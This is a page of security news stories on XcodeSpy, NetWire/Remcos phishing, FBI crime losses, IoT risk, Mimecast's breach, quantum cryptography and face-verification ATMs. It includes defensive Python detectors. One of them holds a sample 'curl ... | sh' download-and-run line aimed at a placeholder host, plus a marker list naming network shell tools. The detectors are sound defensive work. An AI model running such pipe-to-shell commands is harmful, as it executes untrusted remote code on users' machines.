More stories

  • Apple developers targeted by new malware, EggShell backdoor

    Malicious Xcode projects are being used to hijack developer systems and spread custom EggShell backdoors. 

    The malware, dubbed XcodeSpy, targets Xcode, the integrated development environment (IDE) used on macOS for developing Apple software and applications. According to research published by SentinelLabs on Thursday, the Run Script feature in the IDE is being exploited in targeted attacks against iOS developers by way of Trojanized Xcode projects freely shared online.

    Legitimate, open source Xcode projects can be found on GitHub. In this case, however, XcodeSpy projects offer “advanced features” for animating iOS tab bars, and once the project is downloaded and launched in Xcode, a malicious script is deployed to install the EggShell backdoor. The malicious project explored by the researchers is a ripped version of TabBarInteraction, a legitimate project that has not itself been compromised.

    The project’s Run Script build phase has been quietly tampered with to connect an attacker’s command-and-control (C2) server to the developer’s build. Specifically, the abused feature is the one that lets custom shell scripts run when an instance of an app is built and launched. The script contacts the C2 to pull down a custom variant of the EggShell backdoor, which installs a user LaunchAgent for persistence.

    Two variants of EggShell have been detected, one of which shares an encrypted string with XcodeSpy. The backdoor is able to hijack the victim developer’s microphone, camera, and keyboard, as well as grab and send files to the attacker’s C2. SentinelLabs says that at least one US organization has been caught up in attacks of this nature and developers in Asia may also have succumbed to the campaign, which was in operation at least between July and October last year.

    Samples of the backdoors were uploaded to VirusTotal on August 5 and October 13. XcodeSpy was first uploaded on September 4; however, the researchers suspect the attacker may have uploaded the sample themselves in order to test detection rates.

    “While XcodeSpy appears to be directly targeted at the developers themselves rather than developers’ products or clients, it’s a short step from backdooring a developer’s working environment to delivering malware to users of that developer’s software,” the researchers say. “Consequently, all Apple developers are cautioned to check for the presence of malicious Run scripts whenever adopting third-party Xcode projects.”

    Back in August, Trend Micro tracked XCSSET malware in Xcode projects, thought to have been spread to compromise Safari browser sessions for phishing, cross-site scripting (XSS) attacks, and the theft of developer data. The team said the discovery ultimately led to a “rabbit hole of malicious payloads.”

    Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0
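    As an added illustration of the check SentinelLabs recommends above (example code written for this page, not part of the original article or of SentinelLabs’ research), the following Python script lists every Run Script build phase stored in an Xcode project.pbxproj file and flags those containing markers such as download or decode commands. The marker list, the sample project text and the example.invalid placeholder host are constructed assumptions; a hit is a prompt to read the script before building, not proof of compromise.

```python
from __future__ import annotations

import re
import sys
from pathlib import Path

# Markers that commonly appear in Run Script phases which fetch or decode
# content at build time. The list is an assumption for this example; a hit
# means "read this script before building", not "this project is malicious".
SUSPICIOUS_MARKERS = (
    "curl ", "wget ", "nc ", "base64", "eval ", "osascript",
    "launchctl", "LaunchAgents", "python -c", "perl -e", "/dev/tcp",
)

# Xcode stores each Run Script phase as a quoted string; backslashes escape
# quotes, newlines and tabs inside it.
_SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"')
_ESCAPES = {"n": "\n", "t": "\t"}


def unescape_pbxproj_string(raw: str) -> str:
    """Undo the escaping Xcode applies inside quoted pbxproj strings."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), raw)


def extract_run_scripts(pbxproj_text: str) -> list[str]:
    """Return the decoded shell body of every Run Script phase, in file order."""
    return [unescape_pbxproj_string(m) for m in _SHELL_SCRIPT_RE.findall(pbxproj_text)]


def flag_script(script: str) -> list[str]:
    """Return the suspicious markers present in one script body."""
    return [marker for marker in SUSPICIOUS_MARKERS if marker in script]


def audit_pbxproj(pbxproj_text: str) -> list[dict]:
    """Pair each Run Script phase with the markers found in it."""
    return [
        {"index": i, "script": script, "markers": flag_script(script)}
        for i, script in enumerate(extract_run_scripts(pbxproj_text))
    ]


# Constructed sample: one ordinary build phase and one that pipes a download to sh.
# "example.invalid" is a reserved placeholder domain, not a real host.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
        AA0001 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "echo \"Building $PRODUCT_NAME\"\n";
        };
        AA0002 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "curl -fsSL https://example.invalid/setup.sh | sh\n";
        };
/* End PBXShellScriptBuildPhase section */
'''


def main(argv: list[str]) -> int:
    """Audit the given project.pbxproj files, or the constructed sample if none are given."""
    sources = [(p, Path(p).read_text()) for p in argv[1:]] or [("<sample>", SAMPLE_PBXPROJ)]
    for name, text in sources:
        for finding in audit_pbxproj(text):
            status = "REVIEW" if finding["markers"] else "ok"
            print(f"{name}: Run Script #{finding['index']} [{status}] {finding['markers']}")
            print("    " + finding["script"].strip().replace("\n", "\n    "))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

    Point it at a downloaded project’s `MyApp.xcodeproj/project.pbxproj` before the first build; with no arguments it audits the constructed sample, reporting the first phase as ok and the second as needing review because of the `curl` pipeline.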

  • US taxpayers targeted in NetWire, Remcos Trojan attack wave

    Researchers have analyzed an active campaign targeting US taxpayers in order to spread both NetWire and Remcos Trojans. 

    Tax season is now upon us and, as US residents file their returns ahead of the April deadline, this is also a prime time for cybercriminals to launch campaigns tailored to the annual requirement. Phishing campaigns, unless they are nothing more than mass spray-and-pray attempts, usually hook on a particular theme or situation to elicit enough of a reaction to fool a victim into clicking a malicious link or downloading a malware-laden attachment.

    Examples include a ‘fraud’ alert from a bank, demands for student loan repayments, fake criminal investigations by the IRS, or notices from legitimate companies such as PayPal warning of unauthorized transactions. When it comes to tax season, personal finance-themed phishing emails often include tax return-related content, and this is the hook that the active campaign’s operators have chosen.

    According to research published by Cybereason on Thursday, the phishing messages come with attached documents that use malicious macros to deploy both the NetWire and Remcos Remote Access Trojans (RATs). Once a sample document is opened, its content appears blurred and victims are asked to enable macros and editing in order to view the text. If they accept, a “heavily obfuscated” macro drops a malicious .DLL payload, a dropper for one of the two Trojans, in the /temp directory.

    The .DLL is then injected into Notepad and the infection chain continues with the decryption of payload data using an XOR key to recover executable code. A connection to a command-and-control (C2) server is established and the OpenVPN client is downloaded, together with a side-loaded trojanized .DLL to maintain remote persistence. This side-loaded .DLL unpacks another .DLL, loads it into memory, and injects it into Notepad. A further package is then pulled from the legitimate image hosting service imgur; this package, hidden within an image file using steganography, is one of the two Trojans.

    Remcos and NetWire RAT functionality includes taking screenshots, keylogging, stealing browser logs and clipboard data, file harvesting, the theft of OS information, and the ability to download and execute additional malware. Both RATs are commercially available in underground forums on a cheap Malware-as-a-Service (MaaS) subscription basis, for as little as $10 per subscription, which keeps the potential criminal customer base of the Trojan variants large.

    “The use of various techniques such as steganography, storing payloads on legitimate cloud-based services, and exploiting DLL sideloading against a legitimate software makes these campaigns very difficult to detect,” commented Assaf Dahan, Cybereason head of threat research. “The sensitive information collected from the victims can be sold in the underground communities and used to carry out all manner of identity theft and financial fraud.”
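    The chain above hands two observable behaviours to a defender: Notepad loading a DLL from a temp directory, and Notepad opening an outbound connection. The following Python rules, written for this page as an added example and not taken from Cybereason’s research, run those two checks over a constructed set of Sysmon-style events. The field names, the host-process set and the sample paths and addresses are assumptions; the WINWORD and Chrome events show that the rules stay scoped to the named injection host.

```python
from __future__ import annotations

from pathlib import PureWindowsPath

# Processes that, in normal use, neither load DLLs from a temp directory nor
# open outbound connections. Notepad is the host named in the write-up; the set
# is an assumption for this example and can be extended per environment.
INJECTION_HOSTS = {"notepad.exe"}

# Path fragments that identify the writable temp locations droppers favour.
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\temp\\")


def is_temp_path(path: str) -> bool:
    """True if a Windows path sits under a temp directory (case-insensitive)."""
    lowered = path.replace("/", "\\").lower()
    return any(fragment in lowered for fragment in TEMP_DIRS)


def evaluate_event(event: dict) -> str | None:
    """Return an alert for one Sysmon-style event, or None if it is benign."""
    proc = PureWindowsPath(event.get("process", "")).name.lower()
    if proc not in INJECTION_HOSTS:
        return None
    kind = event.get("event")
    image = event.get("image", "")
    if kind == "ImageLoad" and image.lower().endswith(".dll") and is_temp_path(image):
        return f"{proc} loaded a DLL from a temp directory: {image}"
    if kind == "NetworkConnect":
        return f"{proc} opened a network connection to {event.get('dest')}"
    return None


def evaluate_events(events: list[dict]) -> list[str]:
    """Run every event through the rules and collect the alerts in order."""
    return [alert for alert in map(evaluate_event, events) if alert]


# Constructed sample telemetry (field names assumed; addresses are documentation ranges).
SAMPLE_EVENTS = [
    {"event": "ImageLoad", "process": r"C:\Windows\System32\notepad.exe",
     "image": r"C:\Windows\System32\kernel32.dll"},
    {"event": "ImageLoad", "process": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Users\alice\AppData\Local\Temp\update.dll"},
    {"event": "ImageLoad", "process": r"C:\Windows\System32\notepad.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\update.dll"},
    {"event": "NetworkConnect", "process": r"C:\Windows\System32\notepad.exe",
     "dest": "203.0.113.10:443"},
    {"event": "NetworkConnect", "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest": "198.51.100.7:443"},
]


if __name__ == "__main__":
    for alert in evaluate_events(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

    On the sample, only the two Notepad events raise alerts. Real telemetry is noisier than this: the `INJECTION_HOSTS` set should list every utility that gets abused as a hollow host in your environment, and the temp-directory rule is deliberately left narrow so that installers and updaters loading from temp paths do not flood the queue.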

  • FBI: One type of scam is costing business the most

    Americans lost over $4.2 billion to cybercriminals and scammers in 2020, according to FBI figures based on complaints it received.  Over the year, the FBI’s Internet Crime Center (IC3) received 791,790 complaints of suspected internet crime, or about 300,000 more than it did in 2019 when the agency recorded estimated losses at more than $3.5 billion. 


    “In 2020, while the American public was focused on protecting our families from a global pandemic and helping others in need, cyber criminals took advantage of an opportunity to profit from our dependence on technology to go on an Internet crime spree,” the FBI says in its Internet Crime Report 2020.

    Once again, business email compromise (BEC) or email account compromise (EAC) were by far the biggest sources of reported losses, totaling $1.8 billion across 19,369 complaints. That’s up slightly from $1.77 billion in reported losses from 23,775 BEC complaints in 2019. Last year saw a steep rise in BEC complaints stemming from identity theft and funds being converted into cryptocurrency. The identity theft frequently occurred after a victim provided a form of ID to a tech support or romance scammer. The stolen ID would be used to set up a bank account to receive stolen BEC funds and convert those to a less traceable cryptocurrency, according to IC3.

    This technique, and the switch to cryptocurrency, differs from previous years, when a senior executive’s email address might have been spoofed and used to instruct a subordinate to wire funds to the fraudster’s bank account.

    The FBI report notes that tech support fraud continues to be a growing problem, and that victims have recently complained about criminals posing as customer support for banks, utility companies or virtual currency exchanges. While the pandemic caused a brief lull in this type of fraud, losses in this category grew to $146 million, 171% more than the losses from 2019. IC3 received 15,421 complaints from victims in 60 countries.

    Ransomware is the other threat that won’t go away. The IC3 received 2,474 complaints and reported losses of $29.1 million. The report notes, however, that this is an underestimate, as it doesn’t account for victim reports made directly to FBI field offices and agents.

    “The FBI does not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered,” the FBI stresses in the report.

    The most common type of internet crime reported to IC3 was phishing (including vishing, smishing, and pharming), with 241,342 complaints. This was more than twice the number of phishing complaints IC3 received in 2019.

    Notable rises in reported losses from specific crime types, comparing 2019 with 2020, included:

  • confidence fraud/romance: $475 million versus $600 million
  • corporate data breach: $53 million versus $129 million
  • investment fraud: $222 million versus $336 million
  • personal data breach: $120 million versus $194 million
  • ransomware: $8.8 million versus $29 million
  • tech support: $54 million versus $146 million

  • Your insecure Internet of Things devices are putting everyone at risk of attack

    Insecure Internet of Things (IoT) devices are potentially putting society as a whole at risk from cyberattacks because cyber criminals are able to exploit these common products that haven’t been designed with any form of security in mind. IoT products have become a staple in many homes and places of work because they’re perceived as helpful to everyday life.


    However, many IoT devices get installed onto networks without proper security procedures in place, either because the user isn’t aware of how to boost the security of the device – for example, by changing the password – or because the device doesn’t come with a password or any options for securing it at all. In some cases, IoT devices leak data onto the internet because the vendor hasn’t properly configured security, whether by mistake or because of pressure to rush the product to market without adding security by design. Either way, poor security in IoT devices can have major consequences.

    “It’s not even just the damage that it can cause to you from the exposure of your personal data; it’s the damage it can cause to really our whole society,” Craig Young, principal security researcher at Tripwire, told the ZDNet Security Update video series. “When you look back at IoT botnets – Mirai, for example – they’ve demonstrated that if you pull together all of these devices, you have some substantial resources.”

    Mirai caused major issues in 2016 when IoT devices infected with malware were roped into a botnet that targeted online infrastructure provider Dyn with a massive DDoS attack, knocking a number of major services offline. Each individual IoT device has only a small amount of computing power, but an army of millions of devices all directing traffic towards a single target is a powerful tool for online disruption. And with so many IoT devices available and easy to find on the internet, it’s something cyber criminals are looking to exploit.

    “What I do worry about is when you’ve got products that are little computers that are pulling down firmware updates from some company that can get hacked and have that firmware replaced with malware. That’s the doomsday scenario,” said Young. “There’s a lot of reason to believe that vendors really don’t take that infrastructure seriously; they’re rushing out the door with features and not taking the time to lay the groundwork for security,” he added.

    While there are initiatives designed to improve Internet of Things security, and information security researchers are attempting to find and disclose problems so they can be repaired, for now it remains an issue because insecure IoT devices are so readily available. “There are so many different companies in the IoT space and there are not enough security researchers going out of their way to work with them and fix these things,” said Young.

    Users can help ensure the IoT devices they install on their network are secure by, when possible, buying products from vendors that are known and trustworthy rather than a cheap product from a vendor they’ve never heard of before. Users should also ensure that, when possible, the device isn’t secured with a default password.

  • Intel, DARPA ink 3-year deal for custom, secure ASICs


    Intel and DARPA have outlined a three-year partnership to develop and manufacture Application Specific Integrated Circuit (ASIC) processors as nations scramble to make secure semiconductors domestically. DARPA (the U.S. Defense Advanced Research Projects Agency) and Intel said they will design custom chips that include security countermeasure technologies. The partnership is called Structured Array Hardware for Automatically Realized Applications (SAHARA).

    With cybersecurity and nation-state threats becoming common issues, countries are looking to put more manufacturing within their borders and secure the supply chain. Intel is the only advanced semiconductor manufacturer in the US. Under the partnership, Intel will supply its Intel eASIC structured ASIC technology with enhanced security, which defense and commercial electronics developers can then use to develop and deploy processors. The chips are based on Intel’s 10nm semiconductor process.

    On the security side, Intel will partner with the University of Florida, Texas A&M and the University of Maryland to develop security countermeasure technologies. The aim is to better protect data and intellectual property against reverse engineering and counterfeiting. The universities will test the security of the processors. Last week, Intel and Microsoft said they have signed a deal to better secure data in cloud and virtual environments.

  • Mimecast reveals source code theft in SolarWinds hack

    Mimecast has revealed the theft of its source code in a cyberattack linked to the SolarWinds breach. 

    According to Mimecast’s security incident disclosure, published on March 16, a malicious SolarWinds Orion update was used to access the company’s production grid environment. The cloud and email security firm said “a limited number of source code repositories” were downloaded during a cyberattack in January, but added that the company currently has “no evidence” that this code was maliciously modified or that the loss will impact any existing products.

    “We have no evidence that the threat actor accessed email or archive content held by us on behalf of our customers,” Mimecast says. “We believe that the source code downloaded by the threat actor was incomplete and would be insufficient to build and run any aspect of the Mimecast service.”

    Alongside the source code theft, some Mimecast-issued certificates and limited customer server connection datasets were compromised by the attackers. Mimecast was made aware of a certificate security issue by Microsoft in January; Microsoft told the company that a certificate used to authenticate Mimecast Sync and Recover, Continuity Monitor, and IEP was being exploited to target a small number of M365 tenants from non-Mimecast IP addresses. A new certificate connection was issued before Microsoft disabled the hijacked certificate at Mimecast’s request.

    In addition, the unidentified threat actors were able to access email addresses, contact information, and credentials, although the latter were encrypted or hashed and salted.

    The SolarWinds supply chain attack, first disclosed in December, has impacted thousands of enterprise and government organizations. Software vendor SolarWinds was breached and an update for its Orion software was infected with malware before being pushed to countless users, creating a widespread supply chain compromise. Mimecast and FireEye’s Mandiant team have been working together on an investigation of the security breach. According to the companies, the initial intrusion was made through Sunburst malware loaded alongside the malicious Orion update.

    Mimecast recommends that customers in the US and UK reset any server connection credentials used on the Mimecast platform as a “precautionary measure.” The cloud security firm says that hashed credentials are also being reset, and customers involved in the breach have been notified. Mimecast has also upgraded its encryption algorithm for stored credentials and has pulled SolarWinds Orion from its infrastructure. All impacted servers have been replaced. Microsoft estimates that the attack, suspected of being the handiwork of the Russian state-sponsored group Nobelium, may have required the efforts of up to 1,000 engineers to create.

  • Quantum computing breaking into real-world biz, but not yet into cryptography

    Quantum computing is ready for mainstream deployment and is already being tapped to resolve real-world business challenges. Use of the technology to crack cryptography and encryption, however, still has some way to go.

    In particular, D-Wave Systems CEO Alan Baratz believes it could take at least another decade before factoring is viable on quantum computing systems and can be used to undermine current cryptographic tools. This was likely the case whether a gate-based system, with its volatile error correction, or D-Wave’s annealing technology was tapped to factor the large numbers used in cryptography tools, Baratz said in a video call with ZDNet. That said, D-Wave had an internal security team that monitored activity on its systems, he revealed, whilst acknowledging that it was still too soon to determine the types of hacking tools that could be, or had been, created on quantum computers.

    The Canadian quantum computing vendor does not specifically focus on cryptography, but its technology has been used to power intrusion and threat detection applications. It also has a presence in the US, UK, and Japan, and has 20 paying customers in the Asian market. Its cloud-based Leap quantum computing service is available in Singapore via Amazon Web Services (AWS).

    A Deloitte Consulting report echoed Baratz’s views, stating that quantum computers would not be breaking cryptography, or running at computational speeds sufficient to do so, anytime soon. However, it said quantum systems could pose a real threat in the long term and that it was critical to prepare now for such a future. On the impact on Bitcoin and blockchain, for instance, the consulting firm estimated that 25% of Bitcoins in circulation were vulnerable to a quantum attack, pointing in particular to cryptocurrency currently stored in P2PK (Pay to Public Key) and reused P2PKH (Pay to Public Key Hash) addresses. These were potentially at risk because their public keys could be obtained directly from the address or were made public when the Bitcoins were used.

    Deloitte suggested one way to plug such gaps was post-quantum cryptography, though these algorithms could pose other challenges to the usability of blockchains. Adding that this new form of cryptography was currently being assessed by experts, it said: “We anticipate that future research into post-quantum cryptography will eventually bring the necessary change to build robust and future-proof blockchain applications.”

    Mathematician Peter Shor in 1994 published a quantum algorithm that he said could break the most common asymmetric cryptography algorithms. It suggested that, given a large enough quantum computing system, the algorithm could be used to identify the private key matching a given public key and so impersonate digital signatures. A team of engineers and researchers in Singapore last year also announced plans to tap quantum cryptography technology to enhance network encryption tools, so these would be ready to mitigate security risks when quantum computing becomes mainstream. Specifically, they were looking to use “measurement-device-independent” quantum key distribution (MDI QKD) technology and hoped their research could pave the way to a new class of “quantum-resilient encryptors”.

    Quantum ready for mainstream enterprise application

    While the technology has yet to break cryptography, quantum computing is ready for mainstream adoption and is already being tapped to address real-world enterprise challenges. Pointing specifically to D-Wave’s proprietary annealing technology, Baratz said this allowed quantum computing to scale more easily and be less sensitive to noise and computational errors, to which gate-based systems were prone. Currently in its fifth generation, D-Wave’s quantum computers clock more than 5,000 qubits and are capable of supporting rollout “at commercial scale”, he said. This, he added, was a stage that no other market player had been able to achieve thus far with the gate-based model.

    Commonly adopted in the industry today, the gate model made quantum computers tough to build and sensitive to errors. Its most stable state currently yielded about 30 qubits, which was sufficient to power mostly research work and unlikely to be used to solve business problems at scale for another seven to 10 years, he said. “Error rates on [gate-based systems] are so high you can’t really do anything with them, even with small problems,” he added, noting that a competitor last year said it was able to solve a specific optimisation problem on its quantum computer. However, this was possible only once in every 100,000 attempts, he said. Quantum computing runs on principles of quantum mechanics that include probabilistic computation.

    Baratz said annealing technology, designed specifically for optimisation purposes, had a higher influence on the probability of outcomes and, hence, was less sensitive to errors. It also learnt from where it ended the previous computation to fine-tune future ones. “When you lose coherence, you end up with garbage. With annealing, when you lose coherence, you settle into a [potential] solution and restart the computation to try and improve the solution,” he said. The gate-based model, in comparison, could not do that, since it would lose coherence after every computation rather than pick up from the previous run.

    A grocer using D-Wave to enhance a portion of its logistics system was able to solve an optimisation problem in two minutes per week per location, where previously it took 25 hours per week per location, he noted. There are currently more than 20,000 developers worldwide who have signed up to access Leap, with some 1,000 regularly using the service each month. Paying customers fork out an estimated $2,000 an hour to run computations on D-Wave computers.

    Baratz noted, though, that its systems could not solve all quantum computing problems, because annealing was designed specifically for optimisation problems, which were common challenges for businesses. Gate-based systems, on the other hand, would be able to solve any computational problem once the error rates were reduced, something he said likely would not materialise for at least another seven years. So while D-Wave’s annealing-powered quantum computers were limited to solving optimisation problems, they were capable of solving real-world business challenges today, he said. Its systems were also on a path to building a universal error correction system by leveraging the technology it already had, he added. To date, more than 250 applications had been built on D-Wave systems, most of which used Leap and spanned use cases including financial modelling, scheduling, protein folding, and manufacturing optimisation, the vendor said.

  • Singapore bank turns on face verification at ATMs

    OCBC Bank has turned on face verification at selected ATMs across Singapore, letting its customers authenticate their identity without the need for an ATM card. Access, though, is currently limited to balance queries, with other transactions to be added at a later stage. Facial biometrics are available at eight ATMs in the city-state, including at the local bank’s main branches in Tampines and in the CBD, and at a convenience store. For now, OCBC customers will only be able to use the authentication option to check their account balance, according to a statement released Thursday.

    The Singapore bank said access would be expanded to include cash withdrawals “progressively”, but gave no timeline for this. After that was added to the list of services accessible via face verification, it said, others would be introduced from next year, including cash deposits, funds transfers to other banks, cashcard top-ups, and credit card bill payments. OCBC noted that balance queries and cash withdrawals were the two most used services at its ATMs, accounting for almost 8 in 10 transactions carried out at these machines in Singapore.

    The feature is powered by the government’s SingPass Face Verification system, where an individual’s scanned face is verified against the national biometric database comprising images and identities of more than 4 million local residents. The technology is embedded with security features that the Singapore government says safeguard against fraud, such as liveness detection capabilities to detect and block the use of photographs, videos, or masks during the verification process.

    The option to verify a customer’s identity through facial biometrics also bypasses the need for ATM cards, which could be skimmed or stolen, OCBC said. Customers keen to use the feature are prompted to enter their identification number before positioning their face within a frame on the screen. The eight selected ATMs are fitted with a pre-installed web-enabled camera that scans the customer’s face and verifies it in real time against the national database, to which OCBC’s ATMs are digitally linked. Once verified, the customer is allowed to proceed with their transaction.

    Noting that consumers here, including the elderly, were avid digital adopters, the bank’s Singapore head of consumer financial services Sunny Quek said: “While cash is still a key mode of payment in Singapore, the digital overlay to get cash is very welcomed by consumers.” He noted that digital adoption within OCBC had grown more than 40% last year, with more customers signed up on the country’s digital e-payment system PayNow, and PayNow transactions doubling compared to 2019. QR code cash withdrawals at the bank’s ATMs, launched in July 2019, also grew 88% year-on-year in 2020, Quek said, adding that the introduction of face verification provided another layer of convenience for customers who used the bank’s touchpoints.

    According to OCBC, ATM use remained high amongst its customers even amidst high adoption of digital banking services, at more than 2 million cash withdrawals a month. It noted that more than 200,000 customers made their first digital banking transactions last year. Its mobile banking app also clocks more than 7 million logins each month via face or fingerprint biometric authentication. Since including SingPass as a login option for its customers last July, OCBC said more than 1 million logins on its digital banking platforms were carried out using the e-government system instead of access codes and PINs.